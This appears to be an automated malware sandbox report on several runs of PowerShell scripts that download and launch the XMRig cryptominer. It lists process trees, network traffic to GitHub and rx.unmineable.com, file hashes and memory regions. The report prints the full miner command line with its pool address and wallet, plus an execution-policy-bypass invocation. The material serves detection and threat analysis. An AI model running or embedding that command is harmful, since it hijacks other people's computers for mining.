"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=1420 --field-trial-handle=1928,i,13242902252791919845,10377620236057253993,262144 --variations-seed-version /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=3732 --field-trial-handle=1928,i,13242902252791919845,10377620236057253993,262144 --variations-seed-version /prefetch:8
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 149.220.183.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 144.107.17.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 134.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 209.205.72.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | rx.unmineable.com | udp |
| GB | 161.35.34.195:443 | rx.unmineable.com | tcp |
| US | 8.8.8.8:53 | 195.34.35.161.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 183.59.114.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 196.249.167.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.31.95.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | chromewebstore.googleapis.com | udp |
| US | 8.8.8.8:53 | chromewebstore.googleapis.com | udp |
| FR | 216.58.213.74:443 | chromewebstore.googleapis.com | tcp |
| US | 8.8.8.8:53 | 74.213.58.216.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 136.71.105.51.in-addr.arpa | udp |
Files
memory/648-0-0x00007FF9EA913000-0x00007FF9EA915000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_u1ufh1o2.tee.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/648-10-0x000001797DDB0000-0x000001797DDD2000-memory.dmp
memory/648-11-0x00007FF9EA910000-0x00007FF9EB3D1000-memory.dmp
memory/648-12-0x00007FF9EA910000-0x00007FF9EB3D1000-memory.dmp
memory/648-13-0x00007FF9EA910000-0x00007FF9EB3D1000-memory.dmp
memory/648-15-0x000001797DDE0000-0x000001797DDF2000-memory.dmp
memory/648-16-0x000001797C560000-0x000001797C56A000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
memory/1988-47-0x0000019B68D50000-0x0000019B68D70000-memory.dmp
memory/648-48-0x00007FF9EA913000-0x00007FF9EA915000-memory.dmp
memory/648-49-0x00007FF9EA910000-0x00007FF9EB3D1000-memory.dmp
memory/648-50-0x00007FF9EA910000-0x00007FF9EB3D1000-memory.dmp
memory/1988-51-0x0000019B6A750000-0x0000019B6A770000-memory.dmp
memory/1988-52-0x00007FF7D54C0000-0x00007FF7D60F3000-memory.dmp
memory/1988-53-0x00007FF7D54C0000-0x00007FF7D60F3000-memory.dmp
memory/1988-54-0x0000019B6A790000-0x0000019B6A7B0000-memory.dmp
memory/1988-55-0x0000019B6A770000-0x0000019B6A790000-memory.dmp
memory/1988-56-0x00007FF7D54C0000-0x00007FF7D60F3000-memory.dmp
memory/1988-57-0x00007FF7D54C0000-0x00007FF7D60F3000-memory.dmp
memory/1988-59-0x0000019B6A790000-0x0000019B6A7B0000-memory.dmp
memory/1988-60-0x0000019B6A770000-0x0000019B6A790000-memory.dmp
memory/1988-58-0x00007FF7D54C0000-0x00007FF7D60F3000-memory.dmp
memory/1988-61-0x00007FF7D54C0000-0x00007FF7D60F3000-memory.dmp
memory/1988-62-0x00007FF7D54C0000-0x00007FF7D60F3000-memory.dmp
memory/1988-63-0x00007FF7D54C0000-0x00007FF7D60F3000-memory.dmp
memory/1988-64-0x00007FF7D54C0000-0x00007FF7D60F3000-memory.dmp
memory/1988-65-0x00007FF7D54C0000-0x00007FF7D60F3000-memory.dmp
memory/1988-66-0x00007FF7D54C0000-0x00007FF7D60F3000-memory.dmp
memory/1988-67-0x00007FF7D54C0000-0x00007FF7D60F3000-memory.dmp
memory/1988-68-0x00007FF7D54C0000-0x00007FF7D60F3000-memory.dmp
memory/1988-69-0x00007FF7D54C0000-0x00007FF7D60F3000-memory.dmp
memory/1988-70-0x00007FF7D54C0000-0x00007FF7D60F3000-memory.dmp
memory/1988-71-0x00007FF7D54C0000-0x00007FF7D60F3000-memory.dmp
memory/1988-72-0x00007FF7D54C0000-0x00007FF7D60F3000-memory.dmp
memory/1988-73-0x00007FF7D54C0000-0x00007FF7D60F3000-memory.dmp
memory/1988-74-0x00007FF7D54C0000-0x00007FF7D60F3000-memory.dmp
memory/1988-75-0x00007FF7D54C0000-0x00007FF7D60F3000-memory.dmp
memory/1988-76-0x00007FF7D54C0000-0x00007FF7D60F3000-memory.dmp
memory/1988-77-0x00007FF7D54C0000-0x00007FF7D60F3000-memory.dmp
memory/1988-78-0x00007FF7D54C0000-0x00007FF7D60F3000-memory.dmp
memory/1988-79-0x00007FF7D54C0000-0x00007FF7D60F3000-memory.dmp
memory/1988-80-0x00007FF7D54C0000-0x00007FF7D60F3000-memory.dmp
memory/1988-81-0x00007FF7D54C0000-0x00007FF7D60F3000-memory.dmp
memory/1988-82-0x00007FF7D54C0000-0x00007FF7D60F3000-memory.dmp
memory/1988-83-0x00007FF7D54C0000-0x00007FF7D60F3000-memory.dmp
memory/1988-84-0x00007FF7D54C0000-0x00007FF7D60F3000-memory.dmp
memory/1988-85-0x00007FF7D54C0000-0x00007FF7D60F3000-memory.dmp
memory/1988-86-0x00007FF7D54C0000-0x00007FF7D60F3000-memory.dmp
memory/1988-87-0x00007FF7D54C0000-0x00007FF7D60F3000-memory.dmp
memory/1988-88-0x00007FF7D54C0000-0x00007FF7D60F3000-memory.dmp
memory/1988-89-0x00007FF7D54C0000-0x00007FF7D60F3000-memory.dmp
memory/1988-90-0x00007FF7D54C0000-0x00007FF7D60F3000-memory.dmp
memory/1988-91-0x00007FF7D54C0000-0x00007FF7D60F3000-memory.dmp
memory/1988-92-0x00007FF7D54C0000-0x00007FF7D60F3000-memory.dmp
memory/1988-93-0x00007FF7D54C0000-0x00007FF7D60F3000-memory.dmp
memory/1988-94-0x00007FF7D54C0000-0x00007FF7D60F3000-memory.dmp
memory/1988-95-0x00007FF7D54C0000-0x00007FF7D60F3000-memory.dmp
memory/1988-96-0x00007FF7D54C0000-0x00007FF7D60F3000-memory.dmp
memory/1988-97-0x00007FF7D54C0000-0x00007FF7D60F3000-memory.dmp
memory/1988-98-0x00007FF7D54C0000-0x00007FF7D60F3000-memory.dmp
memory/1988-99-0x00007FF7D54C0000-0x00007FF7D60F3000-memory.dmp
memory/1988-100-0x00007FF7D54C0000-0x00007FF7D60F3000-memory.dmp
memory/1988-101-0x00007FF7D54C0000-0x00007FF7D60F3000-memory.dmp
memory/1988-102-0x00007FF7D54C0000-0x00007FF7D60F3000-memory.dmp
memory/1988-103-0x00007FF7D54C0000-0x00007FF7D60F3000-memory.dmp
memory/1988-104-0x00007FF7D54C0000-0x00007FF7D60F3000-memory.dmp
memory/1988-105-0x00007FF7D54C0000-0x00007FF7D60F3000-memory.dmp
memory/1988-106-0x00007FF7D54C0000-0x00007FF7D60F3000-memory.dmp
memory/1988-107-0x00007FF7D54C0000-0x00007FF7D60F3000-memory.dmp
memory/1988-108-0x00007FF7D54C0000-0x00007FF7D60F3000-memory.dmp
memory/1988-109-0x00007FF7D54C0000-0x00007FF7D60F3000-memory.dmp
memory/1988-110-0x00007FF7D54C0000-0x00007FF7D60F3000-memory.dmp
memory/1988-111-0x00007FF7D54C0000-0x00007FF7D60F3000-memory.dmp
memory/1988-112-0x00007FF7D54C0000-0x00007FF7D60F3000-memory.dmp
memory/1988-113-0x00007FF7D54C0000-0x00007FF7D60F3000-memory.dmp
memory/1988-114-0x00007FF7D54C0000-0x00007FF7D60F3000-memory.dmp
memory/1988-115-0x00007FF7D54C0000-0x00007FF7D60F3000-memory.dmp
memory/1988-116-0x00007FF7D54C0000-0x00007FF7D60F3000-memory.dmp
memory/1988-117-0x00007FF7D54C0000-0x00007FF7D60F3000-memory.dmp
memory/1988-118-0x00007FF7D54C0000-0x00007FF7D60F3000-memory.dmp
Analysis: behavioral15
Detonation Overview
Submitted
2024-05-27 00:27
Reported
2024-05-27 05:20
Platform
win10v2004-20240508-en
Max time kernel
1793s
Max time network
1789s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 2564 wrote to memory of 4740 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 2564 wrote to memory of 4740 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (5).ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.109.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 183.142.211.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 144.107.17.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.109.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 134.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 204.79.197.237:443 | g.bing.com | tcp |
| US | 8.8.8.8:53 | 133.211.185.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 237.197.79.204.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 88.156.103.20.in-addr.arpa | udp |
| NL | 23.62.61.155:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 155.61.62.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 196.249.167.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | rx.unmineable.com | udp |
| GB | 161.35.34.195:443 | rx.unmineable.com | tcp |
| US | 8.8.8.8:53 | 195.34.35.161.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 183.59.114.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 171.39.242.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 19.229.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 170.117.168.52.in-addr.arpa | udp |
Files
memory/2564-0-0x00007FFF67033000-0x00007FFF67035000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_w2n0bpzn.qo1.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/2564-2-0x00000123783B0000-0x00000123783D2000-memory.dmp
memory/2564-11-0x00007FFF67030000-0x00007FFF67AF1000-memory.dmp
memory/2564-12-0x00007FFF67030000-0x00007FFF67AF1000-memory.dmp
memory/2564-14-0x00007FFF67030000-0x00007FFF67AF1000-memory.dmp
memory/2564-15-0x0000012378440000-0x0000012378452000-memory.dmp
memory/2564-16-0x0000012378420000-0x000001237842A000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
memory/4740-47-0x000001BFF2070000-0x000001BFF2090000-memory.dmp
memory/4740-48-0x000001BFF20B0000-0x000001BFF20D0000-memory.dmp
memory/4740-49-0x00007FF776740000-0x00007FF777373000-memory.dmp
memory/4740-50-0x00007FF776740000-0x00007FF777373000-memory.dmp
memory/4740-52-0x000001BFF20F0000-0x000001BFF2110000-memory.dmp
memory/4740-51-0x000001BFF20D0000-0x000001BFF20F0000-memory.dmp
memory/2564-53-0x00007FFF67033000-0x00007FFF67035000-memory.dmp
memory/2564-54-0x00007FFF67030000-0x00007FFF67AF1000-memory.dmp
memory/4740-55-0x00007FF776740000-0x00007FF777373000-memory.dmp
memory/4740-56-0x00007FF776740000-0x00007FF777373000-memory.dmp
memory/4740-58-0x000001BFF20F0000-0x000001BFF2110000-memory.dmp
memory/4740-57-0x000001BFF20D0000-0x000001BFF20F0000-memory.dmp
memory/4740-59-0x00007FF776740000-0x00007FF777373000-memory.dmp
memory/4740-60-0x00007FF776740000-0x00007FF777373000-memory.dmp
memory/4740-61-0x00007FF776740000-0x00007FF777373000-memory.dmp
memory/4740-62-0x00007FF776740000-0x00007FF777373000-memory.dmp
memory/4740-63-0x00007FF776740000-0x00007FF777373000-memory.dmp
memory/4740-64-0x00007FF776740000-0x00007FF777373000-memory.dmp
memory/4740-65-0x00007FF776740000-0x00007FF777373000-memory.dmp
memory/4740-66-0x00007FF776740000-0x00007FF777373000-memory.dmp
memory/4740-67-0x00007FF776740000-0x00007FF777373000-memory.dmp
memory/4740-68-0x00007FF776740000-0x00007FF777373000-memory.dmp
memory/4740-69-0x00007FF776740000-0x00007FF777373000-memory.dmp
memory/4740-70-0x00007FF776740000-0x00007FF777373000-memory.dmp
memory/4740-71-0x00007FF776740000-0x00007FF777373000-memory.dmp
memory/4740-72-0x00007FF776740000-0x00007FF777373000-memory.dmp
memory/4740-73-0x00007FF776740000-0x00007FF777373000-memory.dmp
memory/4740-74-0x00007FF776740000-0x00007FF777373000-memory.dmp
memory/4740-75-0x00007FF776740000-0x00007FF777373000-memory.dmp
memory/4740-76-0x00007FF776740000-0x00007FF777373000-memory.dmp
memory/4740-77-0x00007FF776740000-0x00007FF777373000-memory.dmp
memory/4740-78-0x00007FF776740000-0x00007FF777373000-memory.dmp
memory/4740-79-0x00007FF776740000-0x00007FF777373000-memory.dmp
memory/4740-80-0x00007FF776740000-0x00007FF777373000-memory.dmp
memory/4740-81-0x00007FF776740000-0x00007FF777373000-memory.dmp
memory/4740-82-0x00007FF776740000-0x00007FF777373000-memory.dmp
memory/4740-83-0x00007FF776740000-0x00007FF777373000-memory.dmp
memory/4740-84-0x00007FF776740000-0x00007FF777373000-memory.dmp
memory/4740-85-0x00007FF776740000-0x00007FF777373000-memory.dmp
memory/4740-86-0x00007FF776740000-0x00007FF777373000-memory.dmp
memory/4740-87-0x00007FF776740000-0x00007FF777373000-memory.dmp
memory/4740-88-0x00007FF776740000-0x00007FF777373000-memory.dmp
memory/4740-89-0x00007FF776740000-0x00007FF777373000-memory.dmp
memory/4740-90-0x00007FF776740000-0x00007FF777373000-memory.dmp
memory/4740-91-0x00007FF776740000-0x00007FF777373000-memory.dmp
memory/4740-92-0x00007FF776740000-0x00007FF777373000-memory.dmp
memory/4740-93-0x00007FF776740000-0x00007FF777373000-memory.dmp
memory/4740-94-0x00007FF776740000-0x00007FF777373000-memory.dmp
memory/4740-95-0x00007FF776740000-0x00007FF777373000-memory.dmp
memory/4740-96-0x00007FF776740000-0x00007FF777373000-memory.dmp
memory/4740-97-0x00007FF776740000-0x00007FF777373000-memory.dmp
memory/4740-98-0x00007FF776740000-0x00007FF777373000-memory.dmp
memory/4740-99-0x00007FF776740000-0x00007FF777373000-memory.dmp
memory/4740-100-0x00007FF776740000-0x00007FF777373000-memory.dmp
memory/4740-101-0x00007FF776740000-0x00007FF777373000-memory.dmp
memory/4740-102-0x00007FF776740000-0x00007FF777373000-memory.dmp
memory/4740-103-0x00007FF776740000-0x00007FF777373000-memory.dmp
memory/4740-104-0x00007FF776740000-0x00007FF777373000-memory.dmp
memory/4740-105-0x00007FF776740000-0x00007FF777373000-memory.dmp
memory/4740-106-0x00007FF776740000-0x00007FF777373000-memory.dmp
memory/4740-107-0x00007FF776740000-0x00007FF777373000-memory.dmp
memory/4740-108-0x00007FF776740000-0x00007FF777373000-memory.dmp
memory/4740-109-0x00007FF776740000-0x00007FF777373000-memory.dmp
memory/4740-110-0x00007FF776740000-0x00007FF777373000-memory.dmp
memory/4740-111-0x00007FF776740000-0x00007FF777373000-memory.dmp
memory/4740-112-0x00007FF776740000-0x00007FF777373000-memory.dmp
memory/4740-113-0x00007FF776740000-0x00007FF777373000-memory.dmp
memory/4740-114-0x00007FF776740000-0x00007FF777373000-memory.dmp
memory/4740-115-0x00007FF776740000-0x00007FF777373000-memory.dmp
memory/4740-116-0x00007FF776740000-0x00007FF777373000-memory.dmp
memory/4740-117-0x00007FF776740000-0x00007FF777373000-memory.dmp
Analysis: behavioral7
Detonation Overview
Submitted
2024-05-27 00:27
Reported
2024-05-27 05:18
Platform
win10v2004-20240426-en
Max time kernel
1791s
Max time network
1803s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 2460 wrote to memory of 2660 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 2460 wrote to memory of 2660 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (3).ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 232.168.11.51.in-addr.arpa | udp |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 134.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | rx.unmineable.com | udp |
| GB | 161.35.34.195:443 | rx.unmineable.com | tcp |
| US | 8.8.8.8:53 | 149.220.183.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 195.34.35.161.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 228.249.119.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 157.123.68.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.31.95.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 13.227.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 4.173.189.20.in-addr.arpa | udp |
Files
